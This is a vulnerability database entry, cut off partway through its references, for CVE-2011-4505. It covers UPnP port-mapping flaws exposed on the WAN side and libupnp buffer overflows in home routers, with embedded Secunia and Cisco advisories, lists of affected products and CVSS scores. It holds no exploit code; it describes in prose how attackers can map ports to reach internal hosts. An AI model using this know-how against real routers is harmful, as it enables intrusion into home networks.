Vulnerability from variot - Updated: 2023-12-18 12:09The UPnP IGD implementation on SpeedTouch 5x6 devices with firmware before 6.2.29 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an "external forwarding" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. The following devices are affected: Cisco Linksys WRT54G firmware version prior to 4.30.5 Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1 Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1 Cisco Linksys WRT54GX firmware 2.00.05 Edimax BR-6104K prior to 3.25 Edimax 6114Wg Canyon-Tech CN-WF512 firmware version 1.83 Canyon-Tech CN-WF514 firmware version 2.08 Sitecom WL-153 prior to firmware 1.39 Sitecom WL-111 Sweex LB000021 firmware version 3.15 ZyXEL P-330W SpeedTouch 5x6 firmware versions prior to 6.2.29 Thomson TG585 firmware versions prior to 7.4.3.2. Speedtouch is a wireless Internet router for the home. This vulnerability is related to the \"external forwarding\" vulnerability. ----------------------------------------------------------------------
The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52035/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
RELEASE DATE: 2013-01-31
DISCUSS ADVISORY: http://secunia.com/advisories/52035/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/52035/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=52035
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Multiple vulnerabilities have been reported in multiple Siemens OZW and OZS products, which can be exploited by malicious people to compromise a vulnerable device.
1) Multiple vulnerabilities are caused due to a bundled version of libupnp.
For more information: SA51949
2) Multiple boundary errors within the "unique_service_name()" function (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests can be exploited to cause stack-based buffer overflows. The vendor is planning to provide fixes with upcoming firmware updates.
PROVIDED AND/OR DISCOVERED BY: 2) Rapid7
ORIGINAL ADVISORY: Siemens SSA-963338: http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf
Rapid7: https://community.rapid7.com/docs/DOC-2150 https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. This library is used in several vendor network devices in addition to media streaming and file sharing applications. These vulnerabilities were disclosed on January 29th, 2013 in a CERT Vulnerability Note, VU#922681, which can be viewed at:
http://www.kb.cert.org/vuls/id/922681
Cisco is currently evaluating products for possible exposure to these vulnerabilities. This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp
-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)
iF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+ ga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5 =6sTu -----END PGP SIGNATURE-----
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201111-0161",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "speedtouch 5x6 router",
"scope": "lte",
"trust": 1.0,
"vendor": "alcatel",
"version": "6.2"
},
{
"model": "speedtouch 5x6 router",
"scope": "eq",
"trust": 1.0,
"vendor": "alcatel",
"version": "*"
},
{
"model": "br-6104k",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "6114wg",
"scope": "eq",
"trust": 0.9,
"vendor": "edimax",
"version": "0"
},
{
"model": "cn-wf514",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "2.08"
},
{
"model": "cn-wf512",
"scope": "eq",
"trust": 0.9,
"vendor": "canyon tech",
"version": "1.83"
},
{
"model": "tg585 router",
"scope": "eq",
"trust": 0.9,
"vendor": "thomson",
"version": "0"
},
{
"model": null,
"scope": "eq",
"trust": 0.9,
"vendor": "speedtouch",
"version": "5x60"
},
{
"model": "wl-153",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": "wl-111",
"scope": "eq",
"trust": 0.9,
"vendor": "sitcom",
"version": "0"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "canyon tech",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "edimax computer",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys a division of cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sitecom",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sweex",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "technicolor",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "zyxel",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "axis",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "fujitsu",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "huawei",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "linksys",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "nec",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "siemens",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "sony",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "synology",
"version": null
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "ipitomy",
"version": null
},
{
"model": "speedtouch 5x6 router",
"scope": null,
"trust": 0.8,
"vendor": "alcatel lucent",
"version": null
},
{
"model": "speedtouch 5x6 router",
"scope": "lt",
"trust": 0.8,
"vendor": "alcatel lucent",
"version": "6.2.29"
},
{
"model": "",
"scope": null,
"trust": 0.8,
"vendor": "multiple vendors",
"version": null
},
{
"model": "wrt54g beta/2.0",
"scope": "eq",
"trust": 0.6,
"vendor": "linksys",
"version": "4.04.20.6/4.04.0.7/3.03.3.6/3.03.1.3/2.02.4.4/2.02.02.82.00.8"
},
{
"model": "speedtouch 5x6 router",
"scope": "eq",
"trust": 0.6,
"vendor": "alcatel",
"version": "6.2"
},
{
"model": "p-330w",
"scope": "eq",
"trust": 0.3,
"vendor": "zyxel",
"version": "0"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.20.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.1.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.4.4"
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "tg585 router",
"scope": "ne",
"trust": 0.3,
"vendor": "thomson",
"version": "7.4.3.2"
},
{
"model": null,
"scope": "ne",
"trust": 0.3,
"vendor": "speedtouch",
"version": "5x66.2.29"
},
{
"model": "wl-153",
"scope": "ne",
"trust": 0.3,
"vendor": "sitcom",
"version": "1.39"
},
{
"model": "wrt54g",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.01.0.6"
},
{
"model": "br-6104k",
"scope": "ne",
"trust": 0.3,
"vendor": "edimax",
"version": "3.25"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:alcatel:speedtouch_5x6_router_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "6.2",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:alcatel:speedtouch_5x6_router:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4505"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Daniel Garcia",
"sources": [
{
"db": "BID",
"id": "50810"
}
],
"trust": 0.3
},
"cve": "CVE-2011-4505",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CARNEGIE MELLON",
"availabilityImpact": "COMPLETE",
"availabilityRequirement": "NOT DEFINED",
"baseScore": 9.4,
"collateralDamagePotential": "NOT DEFINED",
"confidentialityImpact": "NONE",
"confidentialityRequirement": "NOT DEFINED",
"enviromentalScore": 8.0,
"exploitability": "PROOF-OF-CONCEPT",
"exploitabilityScore": 10.0,
"id": "VU#357851",
"impactScore": 9.2,
"integrityImpact": "COMPLETE",
"integrityRequirement": "NOT DEFINED",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"remediationLevel": "WORKAROUND",
"reportConfidence": "CONFIRMED",
"severity": "HIGH",
"targetDistribution": "NOT DEFINED",
"trust": 0.8,
"userInterationRequired": null,
"vector_string": "AV:N/AC:L/Au:N/C:N/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2011-4505",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-52450",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2011-4505",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#357851",
"trust": 0.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201111-367",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-52450",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The UPnP IGD implementation on SpeedTouch 5x6 devices with firmware before 6.2.29 allows remote attackers to establish arbitrary port mappings by sending a UPnP AddPortMapping action in a SOAP request to the WAN interface, related to an \"external forwarding\" vulnerability. The Portable SDK for UPnP Devices libupnp library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, therefore exposing the vulnerabilities to the internet. Universal Plug and Play (UPnP) Multiple compatible routers have vulnerabilities with insufficient access restrictions. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. These requests can be used to connect to the internal host or proxy connection of the NAT firewall. Remote unauthenticated attackers can exploit vulnerabilities to scan internal hosts or communicate via the device proxy Internet. \nThe following devices are affected:\nCisco Linksys WRT54G firmware version prior to 4.30.5\nCisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1\nCisco Linksys WRT54GS v4 firmware versions prior to 1.06.1\nCisco Linksys WRT54GX firmware 2.00.05\nEdimax BR-6104K prior to 3.25\nEdimax 6114Wg\nCanyon-Tech CN-WF512 firmware version 1.83\nCanyon-Tech CN-WF514 firmware version 2.08\nSitecom WL-153 prior to firmware 1.39\nSitecom WL-111\nSweex LB000021 firmware version 3.15\nZyXEL P-330W\nSpeedTouch 5x6 firmware versions prior to 6.2.29\nThomson TG585 firmware versions prior to 7.4.3.2. Speedtouch is a wireless Internet router for the home. This vulnerability is related to the \\\"external forwarding\\\" vulnerability. ----------------------------------------------------------------------\n\nThe final version of the CSI 6.0 has been released. \nFind out why this is not just another Patch Management solution: http://secunia.com/blog/325/\n\n----------------------------------------------------------------------\n\nTITLE:\nSiemens OZW / OZS Multiple Products libupnp Buffer Overflow\nVulnerabilities\n\nSECUNIA ADVISORY ID:\nSA52035\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/52035/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nRELEASE DATE:\n2013-01-31\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/52035/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/52035/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=52035\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nMultiple vulnerabilities have been reported in multiple Siemens OZW\nand OZS products, which can be exploited by malicious people to\ncompromise a vulnerable device. \n\n1) Multiple vulnerabilities are caused due to a bundled version of\nlibupnp. \n\nFor more information:\nSA51949\n\n2) Multiple boundary errors within the \"unique_service_name()\"\nfunction (ssdp/ssdp_ctrlpt.c) in libupnp when handling SSDP requests\ncan be exploited to cause stack-based buffer overflows. The vendor is planning\nto provide fixes with upcoming firmware updates. \n\nPROVIDED AND/OR DISCOVERED BY:\n2) Rapid7\n\nORIGINAL ADVISORY:\nSiemens SSA-963338:\nhttp://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf\n\nRapid7:\nhttps://community.rapid7.com/docs/DOC-2150\nhttps://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. This library is used in several vendor network\ndevices in addition to media streaming and file sharing applications. \nThese vulnerabilities were disclosed on January 29th, 2013 in a CERT\nVulnerability Note, VU#922681, which can be viewed at:\n\nhttp://www.kb.cert.org/vuls/id/922681\n\nCisco is currently evaluating products for possible exposure to these\nvulnerabilities. This advisory is available at the following link:\n\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130129-upnp\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niF4EAREIAAYFAlEIJZ8ACgkQUddfH3/BbTrUagD9FnKSVkc2iIfGs+7c8SVPT26+\nga5hYEz9UMUnitcqnbcBAIKe6KnkR6he2zbstVtbTKtqSjE7pfVb3lTKVZSeAkM5\n=6sTu\n-----END PGP SIGNATURE-----\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
}
],
"trust": 4.86
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#357851",
"trust": 5.8
},
{
"db": "NVD",
"id": "CVE-2011-4505",
"trust": 3.4
},
{
"db": "SIEMENS",
"id": "SSA-963338",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#922681",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2011-5063",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "18224",
"trust": 0.6
},
{
"db": "BID",
"id": "50810",
"trust": 0.3
},
{
"db": "SECUNIA",
"id": "52035",
"trust": 0.2
},
{
"db": "VULHUB",
"id": "VHN-52450",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119949",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "119896",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#357851"
},
{
"db": "CERT/CC",
"id": "VU#922681"
},
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "BID",
"id": "50810"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-002341"
},
{
"db": "PACKETSTORM",
"id": "119949"
},
{
"db": "PACKETSTORM",
"id": "119896"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
},
{
"db": "CNNVD",
"id": "CNNVD-201111-367"
}
]
},
"id": "VAR-201111-0161",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "VULHUB",
"id": "VHN-52450"
}
],
"trust": 1.4788191
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5063"
}
]
},
"last_update_date": "2023-12-18T12:09:29.730000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.alcatel-lucent.com"
},
{
"title": "Patch for Multiple Routers UPnP WAN Interface Remote Unauthorized Access Vulnerability (CNVD-2011-5063)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/6021"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2011-5063"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-16",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-52450"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-003035"
},
{
"db": "NVD",
"id": "CVE-2011-4505"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://www.kb.cert.org/vuls/id/357851"
},
{
"trust": 2.5,
"url": "http://toor.do/defcon-19-garcia-upnp-mapping-wp.pdf"
},
{
"trust": 1.6,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?vw=1\u0026articleid=28341"
},
{
"trust": 1.6,
"url": "http://jvn.jp/cert/jvnvu357851"
},
{
"trust": 1.1,
"url": "http://www.upnp-hacks.org/devices.html"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play"
},
{
"trust": 0.9,
"url": "https://community.rapid7.com/docs/doc-2150"
},
{
"trust": 0.9,
"url": "http://www.siemens.com/corporate-technology/pool/de/forschungsfelder/siemens_security_advisory_ssa-963338.pdf"
},
{
"trust": 0.8,
"url": "http://toor.do/upnp.html"
},
{
"trust": 0.8,
"url": "http://www.h-online.com/security/news/item/upnp-enabled-routers-allow-attacks-on-lans-1329727.html"
},
{
"trust": 0.8,
"url": "http://pupnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf"
},
{
"trust": 0.8,
"url": "http://www.rapid7.com/resources/free-security-software-downloads/universal-plug-and-play-jan-2013.jsp"
},
{
"trust": 0.8,
"url": "http://opentools.homeip.net/dev-tools-for-upnp"
},
{
"trust": 0.8,
"url": "http://upnp.sourceforge.net/"
},
{
"trust": 0.8,
"url": "http://www.dlink.com/us/en/technology/upnp"
},
{
"trust": 0.8,
"url": "http://jpn.nec.com/security-info/secinfo/nv13-003.html"
},
{
"trust": 0.8,
"url": "http://www.ipitomy.com/index.php/mi-security-notice-ip001"
},
{
"trust": 0.8,
